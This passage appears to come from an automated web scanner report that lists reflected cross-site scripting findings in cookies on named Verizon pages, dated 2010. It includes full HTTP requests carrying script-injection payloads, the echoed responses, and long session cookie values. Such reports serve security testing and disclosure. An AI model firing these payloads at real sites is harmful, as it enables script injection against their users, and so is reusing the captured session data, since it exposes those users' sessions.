op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*; refURL=http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; amlbcookie=05; lob=consumer; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; NSC_xxx22_tqmbu_mcw=ffffffff895bc67f45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 48782
Expires: Sat, 20 Nov 2010 02:22:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:22:51 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=f9aa6<script>alert(1)</script>cdcfbe4067; expires=Sun, 20-Nov-2011 02:22:51 GMT; path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:27:51 GMT; path=/residentialhelp/; domain=verizon.com

<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Local & Long Distance Phone
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Micro
...[SNIP]...
</strong> f9aa6<script>alert(1)</script>cdcfbe4067</span>
...[SNIP]...

1.160. http://www22.verizon.com/residentialhelp/phone [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/phone

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload eab60<script>alert(1)</script>0a0f7cbd88c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp/phone HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: autosuggest=on; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TXeab60<script>alert(1)</script>0a0f7cbd88c; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*; refURL=http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; amlbcookie=05; lob=consumer; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; NSC_xxx22_tqmbu_mcw=ffffffff895bc67f45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 48783
Expires: Sat, 20 Nov 2010 02:22:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:22:49 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; expires=Sun, 20-Nov-2011 02:22:49 GMT; path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:27:49 GMT; path=/residentialhelp/; domain=verizon.com

<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Local & Long Distance Phone
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Micro
...[SNIP]...
</strong>, TXeab60<script>alert(1)</script>0a0f7cbd88c </span>
...[SNIP]...

1.161. https://www22.verizon.com/Residential/DirecTV/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/DirecTV/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 668a0'><script>alert(1)</script>fc8df7db051 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX668a0'><script>alert(1)</script>fc8df7db051; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65384
Expires: Sat, 20 Nov 2010 02:56:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:56:23 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX668a0'><script>alert(1)</script>fc8df7db051; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Overview
</title><meta name="keywords" content="direct tv, directv, hd tv, hd, hd channels, tv, dvr, direct tv, satellite, satel
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX668A0'><SCRIPT>ALERT(1)</SCRIPT>FC8DF7DB051 ' />
...[SNIP]...

1.162. https://www22.verizon.com/Residential/FiOSInternet/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSInternet/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 165a7'><script>alert(1)</script>638a1bf81ed was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX165a7'><script>alert(1)</script>638a1bf81ed; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119110
Expires: Sat, 20 Nov 2010 02:57:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX165a7'><script>alert(1)</script>638a1bf81ed; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:44 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:44 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX165A7'><SCRIPT>ALERT(1)</SCRIPT>638A1BF81ED ' />
...[SNIP]...

1.163. https://www22.verizon.com/Residential/FiOSInternet/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSInternet/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 9afbe<script>alert(1)</script>42141e4a677 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX9afbe<script>alert(1)</script>42141e4a677; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119106
Expires: Sat, 20 Nov 2010 02:57:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:53 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=TX9afbe<script>alert(1)</script>42141e4a677; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:57:53 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX9AFBE<SCRIPT>ALERT(1)</SCRIPT>42141E4A677 </DIV>
...[SNIP]...

1.164. https://www22.verizon.com/Residential/FiOSInternet/ [dotcomsid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/FiOSInternet/

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adc43"-alert(1)-"8aa6b87ac33 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Residential/FiOSInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
